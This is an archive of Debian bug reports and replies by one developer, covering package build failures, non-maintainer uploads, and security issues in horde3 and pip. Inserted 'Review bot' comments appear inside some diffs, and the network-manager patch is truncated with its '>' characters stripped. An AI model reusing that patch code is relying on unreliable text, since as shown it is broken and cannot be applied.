Bug#1066313: fixed upstream

2024-04-11 Thread micah anderson


These issues are fixed upstream in main, but there is not a release.

The fix is in commit 1171bf2fd4e7a0cab02cf5fca59090b65af9cd29.

Clément would you pull that fix into the package to resolve this FTBFS?



Bug#938737: u1db: Python2 removal in sid/bullseye

2020-02-13 Thread micah anderson
Moritz Mühlenhoff  writes:

> On Fri, Aug 30, 2019 at 07:57:06AM +, Matthias Klose wrote:
>> Package: src:u1db
>> Version: 13.10-6.4
>> Severity: normal
>> Tags: sid bullseye
>> User: debian-pyt...@lists.debian.org
>> Usertags: py2removal
>> 
>> Python2 becomes end-of-live upstream, and Debian aims to remove
>> Python2 from the distribution, as discussed in
>> https://lists.debian.org/debian-python/2019/07/msg00080.html
>> 
>> Your package either build-depends, depends on Python2, or uses Python2
>> in the autopkg tests.  Please stop using Python2, and fix this issue
>> by one of the following actions.
>
> Hi Micah,
> per Wikipedia the Ubuntu One cloud storage was shut down many years
> ago; should this simply be removed?

We were not using it for Ubuntu One cloud storage, but instead as its
more generic use case as "a cross-platform, cross-device, syncable
database API", which we modified to have client-side encrypted database
replicas and documents.

However, it is not being used any longer, and should simply be removed.

-- 
micah



Bug#895381: Severity

2019-01-20 Thread micah anderson


Hello Sergio,

I'm reviewing bugs that are currently release critical at our local bug
squashing party, and I stumbled on yours.

I'm not disputing this bug exists, I'm just trying to determine why it
is you set the severity to "Serious". As you are probably aware, this
severity indicates that this is a severe violation of Debian policy
(violates a "must" or "required" directive), or in the package
maintainer's opinion, makes the package unsuitable for release.

Can you specify what part of debian policy this issue makes this bug
severity "Serious"?

Thanks!

-- 
micah



Bug#892340: Status of upload?

2019-01-20 Thread micah anderson


Hello Marc,

I'm checking up on RC bugs, because we are working on a Bug Squashing
Party here.

Back in November, you were saying you were going to combine this fix
with a bump of upstream's version:

> I was planning to combine this with an update from upstream.

I'm wondering if you are planning on doing this soon? If you aren't,
maybe we could upload the package with the fix?

-- 
micah



Bug#859927: Works, uploaded to DELAYED-3

2017-04-14 Thread micah anderson

That fix works, I've done a NMU fixed package and uploaded it to
DELAYED-3.

Micah



Bug#859927: Confirmed

2017-04-14 Thread micah anderson

I've confirmed this bug, as reported:

I installed lighttpd:

The following NEW packages will be installed:
  lighttpd spawn-fcgi
0 upgraded, 2 newly installed, 0 to remove and 326 not upgraded.
Need to get 299 kB of archives.
After this operation, 1,019 kB of additional disk space will be used.
Do you want to continue? [Y/n] 
Get:1 http://httpredir.debian.org/debian sid/main amd64 lighttpd amd64 1.4.45-1 [284 kB]
Get:2 http://httpredir.debian.org/debian sid/main amd64 spawn-fcgi amd64 1.6.4-1+b1 [14.9 kB]
Fetched 299 kB in 1s (194 kB/s)  
Selecting previously unselected package lighttpd.
(Reading database ... 206019 files and directories currently installed.)
Preparing to unpack .../lighttpd_1.4.45-1_amd64.deb ...
Unpacking lighttpd (1.4.45-1) ...
Selecting previously unselected package spawn-fcgi.
Preparing to unpack .../spawn-fcgi_1.6.4-1+b1_amd64.deb ...
Unpacking spawn-fcgi (1.6.4-1+b1) ...
Setting up spawn-fcgi (1.6.4-1+b1) ...
Setting up lighttpd (1.4.45-1) ...
Created symlink /etc/systemd/system/multi-user.target.wants/lighttpd.service → /lib/systemd/system/lighttpd.service.
Processing triggers for systemd (232-20) ...
Processing triggers for man-db (2.7.6.1-2) ...

and confirmed it is running:

root@reeds:/home/micah/debian/lighttpd-1.4.45# ps auxw |grep lighttpd
www-data  2129  0.0  0.0  58924  5452 ?        Ss   15:03   0:00 /usr/sbin/lighttpd -D -f /etc/lighttpd/lighttpd.conf
root      4119  0.0  0.0  12788   956 pts/3    S+   15:03   0:00 grep lighttpd

I enabled the module as described in the bug:

root@reeds:/home/micah/debian/lighttpd-1.4.45# lighttpd-enable-mod fastcgi-php
Met dependency: fastcgi
Enabling fastcgi-php: ok
Enabling fastcgi: ok
Run "service lighttpd force-reload" to enable changes
root@reeds:/home/micah/debian/lighttpd-1.4.45# service lighttpd force-reload

and now lighttpd is not running:

root@reeds:/home/micah/debian/lighttpd-1.4.45# ps auxw |grep lighttpd
root      4223  0.0  0.0  12788   980 pts/3    S+   15:04   0:00 grep lighttpd

I will attempt to apply the patch and see if it works.

micah



Bug#817521: libapache-mod-removeip: Removal of debhelper compat 4

2017-01-16 Thread micah anderson

Hello,

intrigeri  writes:

> Hi Micah,
>
> Adrian Bunk:
>> Can you anyway NMU this package?
>
>> The alternative is that it will get removed from stretch soon.
>
> Well, it's not a goal of mine to include as many packages in Stretch
> as possible. So I really don't want to be the one who decides that
> a given package will be part of a Debian stable release, if its
> maintainers are not ready to support it there; in this case, I see
> little indication that they are. (And backports are always an option
> anyway :)
>
> Micah, what do you think? If you're ready to support the package in
> Stretch, I'm happy to give some one-shot help by NMU'ing it over the
> week-end.

It would be great if the package could continue to be in
Stretch.

Unfortunately, I have not been able to address this issue, and would be
very happy if you could NMU the work you did to fix this issue!

micah




Bug#848766: reel: FTBFS: ERROR: Test "ruby2.3" failed: Failure/Error: response = http.request(request)

2017-01-08 Thread micah anderson
Antonio Terceiro  writes:

>> Relevant part (hopefully):
>> >  Failure/Error: response = http.request(request)
>> > 
>> >  OpenSSL::SSL::SSLError:
>> >SSL_connect returned=1 errno=0 state=unknown state: sslv3 alert 
>> > unsupported certificate

Hmm, I built the reverse depends on ruby-certificate-authority and found
this failure in reel, and patched it in 0.6.1-3 to fix this error. I'm
surprised it's back; that means something didn't go right with my patch.
I'll have a look at it.

> Micah, was there a specific reason to package an unreleased snapshot of
> ruby-certificate-authority? The changelog doesn't really say anything.

The last official upstream tagged release and gem publish was august
2012. The upstream author bumped the version to 2.0 in Sept. 2012, and
there have been a number of important fixes (including security) since
then. There is also a request in the github issue tracker for a new
release in May 2014, no response.

I spoke with the original packager (Sebastien Badia) about updating this
to the current master which fixes those issues, and he gave the go ahead
if we resolved all the reverse-deps.

micah



Bug#761114: network-manager: erroneously removes externally provided routes

2014-09-10 Thread Micah Anderson
Package: network-manager
Version: 0.9.10.0-2
Severity: serious
Tags: patch
Justification: breaks unrelated software

Hello,

When using unrelated software, such as openvpn, that pushes default routes,
network-manager immediately (and incorrectly) removes that route. This is new
behavior in 0.9.10, it does not do this in previous versions.

I spent quite a bit of time debugging this issue with upstream NM people
on their IRC channel; in the end they came up with a patch that was
committed upstream in git with the following hash:
06703c1670d0f96834b268920b09792e22fdb4c4

I tested this change, and it worked well for me, previously I uploaded a NMU,
with this patch, thinking that this was #755015, and it successfully fixed the
problem for me and others I know who are experiencing this issue. However, the
NMU was not acknowledged in -2, due to it being targeted for the incorrect bug
number.

Considering that this effectively breaks all OpenVPN setups (and other software
that modifies default routes) that are not using network-manager's built-in VPN
mechanisms, this seems to me a serious regression over previous versions. Seeing
as upstream has acknowledged this issue and provided a fix for it and that fix
has been tested and even migrated to testing, it seems to me appropriate to
cherry-pick the change in the package without waiting for the next major release
of NM. 

I'm happy to re-NMU this fix, this time with the right bug number. Attached is
the NMU diff (I'd only add the bug number to the changelog).

micah


-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages network-manager depends on:
ii  adduser3.113+nmu3
ii  dbus   1.8.6-2
ii  init-system-helpers1.21
ii  isc-dhcp-client4.3.1-1
ii  libc6  2.19-10
ii  libdbus-1-31.8.6-2
ii  libdbus-glib-1-2   0.102-1
ii  libgcrypt111.5.4-3
ii  libglib2.0-0   2.40.0-5
ii  libgnutls-deb0-28  3.3.7-2
ii  libgudev-1.0-0 208-8
ii  libmm-glib01.2.0-1
ii  libndp01.4-1
ii  libnewt0.520.52.17-1
ii  libnl-3-2003.2.24-2
ii  libnl-genl-3-200   3.2.24-2
ii  libnl-route-3-200  3.2.24-2
ii  libnm-glib40.9.10.0-2
ii  libnm-util20.9.10.0-2
ii  libpam-systemd 208-8
ii  libpolkit-gobject-1-0  0.105-6.1
ii  libreadline6   6.3-8
ii  libsoup2.4-1   2.46.0-2
ii  libsystemd-daemon0 208-8
ii  libsystemd-login0  208-8
ii  libteamdctl0   1.12-1
ii  libuuid1   2.20.1-5.8
ii  lsb-base   4.1+Debian13
ii  policykit-10.105-6.1
ii  udev   208-8
ii  wpasupplicant  1.1-1

Versions of packages network-manager recommends:
ii  crda  3.13-1
ii  dnsmasq-base  2.71-1
ii  iptables  1.4.21-2
ii  modemmanager  1.2.0-1
ii  ppp   2.4.6-2

Versions of packages network-manager suggests:
ii  avahi-autoipd  0.6.31-4
pn  libteam-utils  none

-- Configuration Files:
/etc/NetworkManager/NetworkManager.conf changed:
[main]
plugins=ifupdown,keyfile
[ifupdown]
managed=false
[logging]


-- no debconf information
diff -Nru network-manager-0.9.10.0/debian/changelog network-manager-0.9.10.0/debian/changelog
--- network-manager-0.9.10.0/debian/changelog	2014-07-10 00:49:54.0 -0400
+++ network-manager-0.9.10.0/debian/changelog	2014-08-11 12:37:33.0 -0400
@@ -1,3 +1,11 @@
+network-manager (0.9.10.0-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pull patch from upstream to fix checks for default
+routes
+
+ -- Micah Anderson mi...@debian.org  Mon, 11 Aug 2014 12:08:31 -0400
+
 network-manager (0.9.10.0-2) unstable; urgency=medium
 
   * New upstream release.
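Review bot: the changelog entry never closes the bug it fixes, which the cover mail itself says still has to be added; the second bullet should end with `(Closes: #761114)`, and it would also usefully name the upstream commit 06703c1670d0f96834b268920b09792e22fdb4c4 cited in the report so the provenance of the cherry-pick is recorded in the package history.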
diff -Nru network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes
--- network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes	1969-12-31 19:00:00.0 -0500
+++ network-manager-0.9.10.0/debian/patches/0006-Fix-checks-for-default-routes	2014-08-11 12:37:08.0 -0400
@@ -0,0 +1,83 @@
+Index: network-manager-0.9.10.0/src/nm-ip4-config.c
+===
+--- network-manager-0.9.10.0.orig/src/nm-ip4-config.c	2014-07-03 20:44:19.0 -0400
 network-manager-0.9.10.0/src/nm-ip4-config.c	2014-07-29 19:42:06.965378158 -0400
+@@ -198,7 +198,7 @@
+ 	for (i = 0; i  priv-routes-len; i++) {
+ 		const NMPlatformIP4Route *route = g_array_index (priv-routes, NMPlatformIP4Route, i);
+ 
+-		if (route-network == 0) {
++		if (NM_PLATFORM_IP_ROUTE_IS_DEFAULT (route)) {
+ 			if (route-metric
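Review bot: the new patch file carries no DEP-3 header (Origin:, Bug-Debian:, Applied-Upstream:) before the `Index:` line even though the report identifies the upstream commit 06703c1670d0f96834b268920b09792e22fdb4c4; adding one lets quilt and the tracker tie the fix to its source. Note also that the hunk header announces 83 added lines but the file is cut off here after `if (route-metric`, and the `>` characters of `priv->routes->len`, `route->network` and `route->metric` have been lost in the archive rendering, so the patch as shown cannot be applied verbatim. The substantive change, replacing the bare `route->network == 0` test with `NM_PLATFORM_IP_ROUTE_IS_DEFAULT (route)`, is the right direction: the macro states the intent explicitly instead of relying on a zero network address alone to identify a default route.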

Bug#758318: FTBFS: missing build-depends: sp

2014-08-16 Thread Micah Anderson
Package: bird
Version: 1.4.4-1
Severity: serious
Tags: patch
Justification: Fails to build from source

Hello,

The bird package currently fails to build from source because during the pdf
generation phase it cannot find /usr/bin/nsgmls. Simply adding the 'sp' package
to the build-depends makes it work again. The attached patch shows this. I'm
happy to upload this as a NMU if it would help you.

make[2]: Entering directory '/home/micah/debian/bird-1.4.4/doc'
/home/micah/debian/bird-1.4.4/tools/progdoc /home/micah/debian/bird-1.4.4
/Doc
/doc/Doc
prog-intro.sgml
/nest/Doc
rt-fib.c
rt-table.c
Warning(551): Function parameter 'before_old' not described in 'rte_announce'
Warning(1446): Function parameter 'tab' not described in 'rt_prune_table'
rt-attr.c
proto.sgml
proto.c
Warning(731): Function parameter 'UNUSED' not described in 'graceful_restart_done'
proto-hooks.c
Warning(161): Function parameter 'buflen' not described in 'get_attr'
iface.c
neighbor.c
Warning(352): Function parameter 'a' not described in 'neigh_ifa_update'
cli.c
locks.c
/conf/Doc
conf.c
cf-lex.l
Warning(561): Function parameter 'c' not described in 'cf_lex_init'
/filter/Doc
filter.c
tree.c
trie.c
Warning(84): Function parameter 'lp' not described in 'f_new_trie'
/proto/Doc
/proto/bfd/Doc
bfd.c
/proto/bgp/Doc
bgp.c
Warning(729): Function parameter 'UNUSED' not described in 'bgp_incoming_connection'
packets.c
attrs.c
/proto/ospf/Doc
ospf.c
topology.c
Warning(1610): Function parameter 'pool' not described in 'ospf_top_new'
neighbor.c
iface.c
packet.c
lsalib.c
dbdes.c
rt.c
/proto/pipe/Doc
pipe.c
/proto/rip/Doc
rip.c
auth.c
/proto/radv/Doc
radv.c
packets.c
/proto/static/Doc
static.c
../nest/rt-dev.c
/sysdep/Doc
sysdep.sgml
/sysdep/unix/Doc
log.c
Warning(106): Function parameter 'buf' not described in 'log_commit'
krt.c
/lib/Doc
ip.c ipv4.c ipv6.c
lists.c
checksum.c bitops.c patmatch.c printf.c xmalloc.c
resource.sgml
resource.c
mempool.c
slab.c
event.c
../sysdep/unix/io.c
Warning(454): Function parameter 'fmt_spec' not described in 'tm_format_datetime'
./sgml2html prog.sgml
Processing file prog.sgml
sh: 1: /usr/bin/nsgmls: not found
./sgml2latex --output=tex prog.sgml
Processing file prog.sgml
sh: 1: /usr/bin/nsgmls: not found
pdflatex prog.tex
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2014/Debian) (preloaded format=pdflatex)
 restricted \write18 enabled.
entering extended mode
! I can't find file `prog.tex'.
* prog.tex

(Press Enter to retry, or Control-D to exit)
Please type another input file name: 

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages bird depends on:
ii  adduser   3.113+nmu3
ii  libc6 2.19-7
ii  libreadline6  6.3-8
ii  libtinfo5 5.9+20140712-2

bird recommends no packages.

Versions of packages bird suggests:
ii  bird-doc  1.4.4-1
diff --git a/debian/changelog b/debian/changelog
index f8b69d0..0f662e4 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+bird (1.4.4-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Add sp package to Build-depends to provide missing /usr/bin/nsgmls
+fixing FTBFS 
+
+ -- Micah Anderson mi...@debian.org  Sat, 16 Aug 2014 15:45:29 -0400
+
 bird (1.4.4-1) unstable; urgency=medium
 
   * New upstream version 1.4.4
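Review bot: the changelog entry does not reference the bug it fixes; the second bullet should close with `(Closes: #758318)` so the BTS is updated on upload, and the trailing whitespace after `fixing FTBFS ` should be dropped.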
diff --git a/debian/control b/debian/control
index 5d10ec6..27c3bd8 100644
--- a/debian/control
+++ b/debian/control
@@ -12,7 +12,7 @@ Build-Depends: quilt,
 	   autotools-dev,
 	   xsltproc,
 	   docbook-xsl,
-	   linuxdoc-tools-latex
+	   linuxdoc-tools-latex, sp
 Maintainer: Ondřej Surý ond...@debian.org
 Standards-Version: 3.9.5
 Vcs-Browser: http://git.debian.org/?p=users/ondrej/bird.git
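Review bot: style, in the Build-Depends hunk: the existing list keeps one dependency per line, so `sp` belongs on its own line (`	   linuxdoc-tools-latex,` followed by `	   sp`) rather than appended to the `linuxdoc-tools-latex` line; this keeps future diffs to the list minimal and matches the surrounding layout.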


Bug#737149: CVE-2014-1691: Remote code execution in horde 5.1.1

2014-01-30 Thread Micah Anderson
Package: horde3
Version: 3.3.8+debian0-2
Severity: serious
Tags: security
Justification: security issue

Hello,

As detailed on the debian security tracker[0] and reported on oss-sec[1] and
assigned CVE-2014-1691, there is a remote code execution bug in horde affecting
all versions from at least horde 3.1.x to 5.1.1.

That includes squeeze... I've got a patch that applies to the horde3 package in 
squeeze that resolves this issue, please find it attached[2]... I've built and 
tested these packages on Squeeze in an active environment. I am not certain 
where this particular code is used, so I wasn't sure if I was able to test 
exactly that code path.

If you would like, I can provide a package for squeeze for a DSA.

Micah

0. https://security-tracker.debian.org/tracker/CVE-2014-1691
1. http://seclists.org/oss-sec/2014/q1/153
2. https://gist.github.com/pietro/8712454/raw/b03bc5ecb7ec1f1f778b867ecd6d9d142d0ddaf7/gistfile1.diff

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.12-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages horde3 depends on:
ii  apache2  2.4.7-1
ii  apache2-bin [httpd]  2.4.7-1
ii  libapache2-mod-php5  5.5.8+dfsg-3
ii  libjs-scriptaculous  1.9.0-2
ii  php-log  1.12.7-1
ii  php-mail 1.2.0-5
ii  php-mail-mime1.8.8-1
ii  php5-gd  5.5.8+dfsg-3
ii  php5-mcrypt  5.5.8+dfsg-3

Versions of packages horde3 recommends:
pn  fckeditor  none
ii  locales2.17-97
ii  logrotate  3.8.7-1
pn  php-date   none
ii  php-db 1.7.14-2
pn  php-file   none
ii  php-mdb2   2.5.0b5-1
pn  php-mdb2-driver-mysql | php-mdb2-driver-pgsql | php-mdb2-driv  none
pn  php-services-weather   none
ii  php5-cli   5.5.8+dfsg-3
pn  php5-mysql | php5-pgsql | php5-ldapnone
pn  tinymce2 | tinymce none

Versions of packages horde3 suggests:
pn  chora2none
pn  enscript  none
ii  gettext   0.18.3.2-1
pn  gollemnone
pn  imp4  none
pn  kronolith2none
ii  libgeoip1 1.6.0-1
pn  libwpd-tools  none
pn  mnemo2none
pn  php-net-imap  none
pn  php5-auth-pam none
ii  php5-common [php5-mhash]  5.5.8+dfsg-3
pn  ppthtml   none
pn  rpm   none
pn  source-highlight  none
pn  turba2none
pn  unrtf none
pn  webcppnone
pn  wvnone
pn  xlhtmlnone

-- Configuration Files:
/etc/horde/horde3/.htaccess [Errno 13] Permission denied: 
u'/etc/horde/horde3/.htaccess'
/etc/horde/horde3/conf.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/conf.php'
/etc/horde/horde3/conf.xml [Errno 13] Permission denied: 
u'/etc/horde/horde3/conf.xml'
/etc/horde/horde3/hooks.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/hooks.php'
/etc/horde/horde3/mime_drivers.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/mime_drivers.php'
/etc/horde/horde3/motd.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/motd.php'
/etc/horde/horde3/nls.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/nls.php'
/etc/horde/horde3/prefs.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/prefs.php'
/etc/horde/horde3/registry.d/README [Errno 13] Permission denied: 
u'/etc/horde/horde3/registry.d/README'
/etc/horde/horde3/registry.php [Errno 13] Permission denied: 
u'/etc/horde/horde3/registry.php'

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#716909: Should be resolved

2013-09-06 Thread Micah Anderson
close 716909
thanks

I believe that I've resolved this, the following addresses are allowed
to send, if there is an additional ftp master email that needs to be
allowed, please let me know and I will add that:

d...@ftp-master.debian.org, debb...@bugs.debian.org,
debb...@busoni.debian.org, debian-bugs-d...@lists.debian.org,
f...@debian.org, instal...@ftp-master.debian.org,
nore...@release.debian.org, ow...@bugs.debian.org,
ow...@busoni.debian.org, ow...@packages.qa.debian.org,
p...@qa.debian.org,pabs q...@master.debian.org

micah




Bug#710163: CVE-2013-1629: Man in the middle possibility

2013-05-28 Thread Micah Anderson
Package: python-pip
Version: 1.1-3
Severity: serious
Tags: security
Justification: security

Hello,

It appears as if python-pip in Debian (all versions supported) suffers
from CVE-2013-1629. This CVE appears to still be reserved, but is
clearly described in a few places on the internet[0],[1].

A new version uploaded to sid would solve this problem there, but to
backport these issues to wheezy and squeeze may be a bit difficult.

Thanks,
micah


0. http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a/
1. https://github.com/TheTorProject/ooni-backend/pull/1#discussion_r4084881

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.8-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages python-pip depends on:
ii  python2.7.3-5
ii  python-pkg-resources  0.6.37-1
ii  python-setuptools 0.6.37-1
ii  python2.6 2.6.8-2

Versions of packages python-pip recommends:
ii  build-essential  11.6
pn  python-dev-all   none

python-pip suggests no packages.

-- no debconf information





Bug#710164: CVE-2013-1629: Man in the middle possibility

2013-05-28 Thread Micah Anderson
Package: python-virtualenv
Version: 1.7.1.2-2
Severity: serious
Tags: security
Justification: security

Hello,

It seems as if python-virtualenv embeds a copy of pip[0], and there is
a security issue with python-pip noted as CVE-2013-1629 which affects
squeeze and wheezy (it appears fixed in sid and jessie). This issue
currently is marked as 'reserved' by Mitre, but it is clearly defined
on the internet[1],[2].

Please coordinate with the debian security team to update this package
as soon as possible to resolve this issue. Please reference this CVE
and bug number in any changelog dealing with this problem.

Micah


0. This is in violation of debian policy '4.13 Convenience copies of
code' and should be fixed to depend on the version of python-pip in
the archive.

1. http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a/
2. https://github.com/TheTorProject/ooni-backend/pull/1#discussion_r4084881

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.8-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash





Bug#698294: [Pkg-puppet-devel] Bug#698294: Bug#698294: diff for NMU 2.7.18-2.1

2013-03-04 Thread micah anderson
Russ Allbery r...@debian.org writes:

> Anton Gladky gl...@debian.org writes:
>
>> Ok, I canceled the upload.
>>
>> We cannot postpone Wheezy-release, waiting for every upstream's
>> decision. If the solution works, why should not it be applied?
>> Otherwise the package should be removed from testing.

The solution may work, but if upstream deems the code insufficient it
might be because of some very important reasons. For example, it might
make this specific situation work, but breaks other things, or only
works for one case, but not another, or many other possible reasons. 

For this issue, what caused this upstream was a fix for another issue,
and I am not sure that the proposed fix will cause the original issue to
re-appear; I don't want a regression for that issue to come up as a
result.

I don't think it is such a great idea to stuff something into the Debian
package that upstream has a problem with, it tends to make upstream
unhappy when they have to deal with the fact that it exists in the
Debian package for years. In particular I'm thinking of how great they
have been when security issues have come up and they've produced
backports of fixes for the versions that we carry. If their backports
aren't going to work because we decided to put in some code that they
didn't like in the first place, how do we deal with the security fix
then?

> The problem is mildly obscure (many Puppet manifests, including very
> complex and non-trivial ones, will never trigger this error condition) and
> absolutely does not warrant removing the package from testing.  In fact,
> I'm tempted to downgrade it to important again, although if there is a
> tested upstream fix, I'd be in favor of applying it for wheezy.

I have to agree with Russ, this is a kind of weird corner case.

micah





Bug#698294: [Pkg-puppet-devel] Bug#698294: diff for NMU 2.7.18-2.1

2013-03-01 Thread micah anderson
Anton Gladky gl...@debian.org writes:

> Hi,
>
> I have rescheduled an upload for 15-days. Or you want me to cancel it
> completely?
>
> Anton
>
> On 03/01/2013 12:45 PM, Stig Sandbeck Mathisen wrote:
>>
>> That patch was marked as Code Insufficient in the upstream bug tracker
>> two weeks ago at http://projects.puppetlabs.com/issues/7680#note-18
>>
>> Please delay it until this is resolved by upstream.

As far as I know, there is no 'DELAYED/until this is resolved by
upstream' queue :)

Uploading something that upstream has deemed insufficient code, even to
DELAYED-15, doesn't seem like the right thing to do, especially since
this places an arbitrary deadline on upstream.

I think it best to cancel this upload until we have a clear fix from
upstream.

I understand that this issue impacts you and you would like a
resolution, but I think that the right thing to do here is to speed up
that resolution with upstream. Figure out what it is that is
insufficient in the code and get that resolved. 

Once upstream is happy with the code, then we can look at what needs to
be done to get this into Debian.





Bug#700350: dovecot-core: fails to upgrade from squeeze to bpo: Can't locate feature.pm in @INC

2013-02-12 Thread micah anderson
Marco Nenciarini mnen...@kcore.it writes:

> On 12/feb/2013, at 17:16, Jaldhar H. Vyas wrote:
>>
>>
>> Thanks for the patch but if the diagnosis is correct it seems it will not be
>> needed as -7 took out the perl code.  So backporting that should solve the
>> problem.  Unfortunately I am rather pressed for time right now and the other
>> dovecot maintainers even more so.  Micah can you take care of this?
>>
>
>
> I can take care of backporting if it's ok for you all.

please go ahead, I'm quite busy until next week myself.

micah




Bug#681549: Still present in 1.2.0-3

2012-12-07 Thread micah anderson
Dane Elwell dane.elw...@ukfast.co.uk writes:

> This bug seems to still exist in CouchDB 1.2.0-3 update that was pushed out
> recently in Wheezy.
>
>
> Setting up couchdb (1.2.0-3) ...
> Installing new version of config file /etc/init.d/couchdb ...
> Installing new version of config file /etc/logrotate.d/couchdb ...
> [] Starting database server: couchdbApache CouchDB needs write permission on the PID file: /var/run/couchdb/couchdb.pid
>  failed!
> invoke-rc.d: initscript couchdb, action start failed.
> dpkg: error processing couchdb (--configure):
>  subprocess installed post-installation script returned error exit status 1
> Errors were encountered while processing:
>  couchdb
> E: Sub-process /usr/bin/dpkg returned an error code (1)


I think this happens when you upgrade from 1.2.0-2, where the bad
ownership was, to 1.2.0-3 where it is fixed. If you install 1.2.0-3
directly, without ever having 1.2.0-2 installed, you no longer have the
problem.





Bug#681549: Unsuitable for release

2012-11-21 Thread micah anderson
severity 681549 serious
thanks

I'm marking this bug as serious (accidentally made it grave a minute
ago), because I believe that it makes the package unsuitable for
release, and the fix is trivial, so it should be able to be brought into
wheezy without issue.

This issue renders the package uninstallable:

Starting database server: couchdbApache CouchDB needs write permission on the PID file: /var/run/couchdb/couchdb.pid
failed!
invoke-rc.d: initscript couchdb, action start failed.
dpkg: error processing couchdb (--configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing: couchdb
E: Sub-process /usr/bin/dpkg returned an error code (1)





Bug#680235: debirf: wheezy minimal image segfaults during boot

2012-09-29 Thread Micah Anderson
Hi Lucas,

* Lucas Nussbaum lu...@lucas-nussbaum.net [2012-09-30 03:43-0400]:
> On 08/09/12 at 23:03 -0400, Daniel Kahn Gillmor wrote:
>> Control: tags 680235 + unreproducible moreinfo
>>
>> Hi Lucas--
>>
>> On 07/04/2012 10:40 AM, Lucas Nussbaum wrote:
>>> I generate a wheezy 'minimal' image using debirf (running it as root,
>>> since running it as normal user fails).
>>>
>>> After generation, I try to boot it using:
>>> kvm -m 512 -kernel vmlinuz-3.2.0-2-amd64 -initrd debirf-minimal_wheezy_3.2.0-2-amd64.cgz
>>>
>>> During boot, I get:
>>> [0.419335] rtc_cmos 00:01: RTC can wake from S4
>>> [0.419735] rtc_cmos 00:01: rtc core: registered rtc_cmos as rtc0
>>> [0.420093] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
>>> [0.420392] cpuidle: using governor ladder
>>> [0.420629] cpuidle: using governor menu
>>> [0.420987] TCP cubic registered
>>> [0.421230] NET: Registered protocol family 10
>>> [0.423396] Mobile IPv6
>>> [0.423606] NET: Registered protocol family 17
>>> [0.423868] Registering the dns_resolver key type
>>> [0.424263] registered taskstats version 1
>>> [0.424643] rtc_cmos 00:01: setting system clock to 2012-07-04 14:30:03 UTC (1341412203)
>>> [0.425109] Initializing network drop monitor service
>>> [0.426024] Freeing unused kernel memory: 572k freed
>>> [0.426406] Write protecting the kernel read-only data: 6144k
>>> [0.428208] Freeing unused kernel memory: 672k freed
>>> [0.430214] Freeing unused kernel memory: 684k freed
>>> [0.432194] init[31]: segfault at 57d71c ip 0044104d sp 7fff83ab17f0 error 7 in sh[40+1b3000]
>>> Segmentation fault
>>> unpacking rootfs...
>>> [1.340047] Refined TSC clocksource calibration: 2793.734 MHz.
>>
>> i've been unable to reproduce this with existing versions, including
>> 0.33 (just uploaded to unstable).  Are you able to see this on other
>> hardware?  do you still have the image you created available?  i'd be
>> happy to take a look at it and try to dissect what's happening.
>
> Hi,
>
> I confirm that I can still reproduce this in wheezy using debirf 0.32.
>
> Using debirf 0.33 (only package that was updated when testing; same
> machine), it works fine both using the minimal.tgz example from debirf
> 0.32, and the one from debirf 0.33.
>
> I've uploaded the broken image to
> http://blop.info/pub/vmlinuz-3.2.0-3-amd64
> http://blop.info/pub/debirf-minimal_wheezy_3.2.0-3-amd64.cgz
>
> To reproduce, boot with
> kvm -m 512 -kernel vmlinuz-3.2.0-3-amd64 -initrd debirf-minimal_wheezy_3.2.0-3-amd64.cgz

I just downloaded your two files and did the kvm command that you provided and I
did not get the segfault, rather it booted up to this:

/proc/cmdline: No such file or directory

Debian GNU/Linux wheezy/sid (none) tty1

(none) login:

but otherwise, I do not get the segfault that you experience. The only
difference here is that I was running in Squeeze. Unfortunately, I could not
find a wheezy box with amd64 and kvm extensions. I'll ask around to see what I
can find.

micah



signature.asc
